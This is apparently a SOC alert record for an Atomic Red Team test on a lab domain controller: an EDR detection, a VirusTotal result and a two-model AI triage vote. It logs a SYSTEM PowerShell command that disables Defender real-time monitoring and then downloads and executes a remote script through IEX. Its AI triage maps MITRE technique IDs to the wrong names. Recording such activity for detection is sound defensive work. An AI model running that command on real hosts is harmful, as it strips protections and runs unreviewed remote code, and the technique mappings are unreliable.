{
  "author": "ckeller@fusioncybersecurity.us",
  "cat": "Realtime Monitoring Process Killed PID 8460",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1039 -CheckPrereqs ; Invoke-AtomicTest T1039 -GetPrereqs ; Invoke-AtomicTest T1039 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 249815040,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pld9B56.tmp.bat T1039 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4575232,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 8460,
        "THIS_ATOM": "c896e11e93fdfcc580e177e469c2a841",
        "THREADS": 3,
        "TIMESTAMP": 1774364737221,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 8460,
      "PROCESS_ID": 9156,
      "THREADS": 30,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "942080e1-239e-4ded-8513-ffb1c5bcc3a2",
      "event_time": 1774364737793,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 3799,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "c896e11e93fdfcc580e177e469c2a841",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "20e47fdec03e5cfc9f50dea369c2a844"
    }
  },
  "detect_id": "7f297351-4352-41fa-bb66-921a69c2a845",
  "gen_time": 1774364741594,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364737\u0026selected=20e47fdec03e5cfc9f50dea369c2a844",
  "namespace": "general",
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "942080e1-239e-4ded-8513-ffb1c5bcc3a2",
    "event_time": 1774364737793,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 3799,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "c896e11e93fdfcc580e177e469c2a841",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "20e47fdec03e5cfc9f50dea369c2a844"
  },
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "general.RealTime Monitoring Tampering",
  "ts": 1774364741000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.825,
  "false_positive_reason": null,
  "investigation_questions": [
    "What user account was originally logged in before SYSTEM took over?",
    "Were there any prior attempts to disable real-time monitoring on this host?",
    "Is the Atomic Red Team framework currently active or has it been removed?"
  ],
  "ioc_analysis": "The process is running from its expected location but contains a known malicious payload pattern. The command line includes \u0027Set-MpPreference -DisableRealtimeMonitoring $true\u0027 which disables EDR protection, followed by downloading and executing the Atomic Red Team framework via IEX (Invoke-Expression). This is a classic attack chain for testing or deploying offensive tools.",
  "iocs_extracted": [
    {
      "type": "command_line",
      "value": "Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing)"
    },
    {
      "type": "url",
      "value": "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1"
    },
    {
      "type": "technique",
      "value": "T1039 - Brute Force"
    }
  ],
  "mitre_techniques": [
    "T1567.001 - Spearphishing Attachment",
    "T1059.001 - Command and Scripting Interpreter: PowerShell",
    "T1562.003 - System Information Discovery"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (split)",
    "Immediately isolate the host from the network to prevent lateral movement.",
    "Block the download URL at the firewall level.",
    "Review all processes spawned by PID 9156 and terminate them.",
    "Check for persistence mechanisms installed via Atomic Red Team."
  ],
  "risk_score": 90,
  "severity": "high",
  "summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a highly malicious PowerShell execution by the SYSTEM account that disables real-time monitoring and downloads/installs the Atomic Red Team framework for testing T1039 (Brute Force). The command explicitly attempts to bypass security controls.\n\n**IOC Analysis:** The process is running from its expected location but contains a known malicious payload pattern. The command line includes \u0027Set-MpPreference -DisableRealtimeMonitoring $true\u0027 which disables EDR protection, followed by downloading and executing the Atomic Red Team framework via IEX (Invoke-Expression). This is a classic attack chain for testing or deploying offensive tools.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.7\nA PowerShell process running as SYSTEM with a suspicious command line that disables real-time monitoring and installs Atomic Red Team tools, indicating potential adversary activity despite the legitimate file path and signature.\n\n**IOC Analysis:** The FILE_PATH is a legitimate system binary location (C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe) and the hash is Microsoft-signed, making the file itself benign. However, the command line includes malicious actions such as disabling real-time monitoring and installing tools from GitHub repositories often used in red teaming, raising suspicion.",
  "verdict": "suspicious",
  "voting": {
    "auto_action": "manual_review",
    "mode": "split",
    "total_models": 2,
    "vote_summary": [
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 70% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.7,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 1,
    "winning_verdict": "suspicious"
  }
}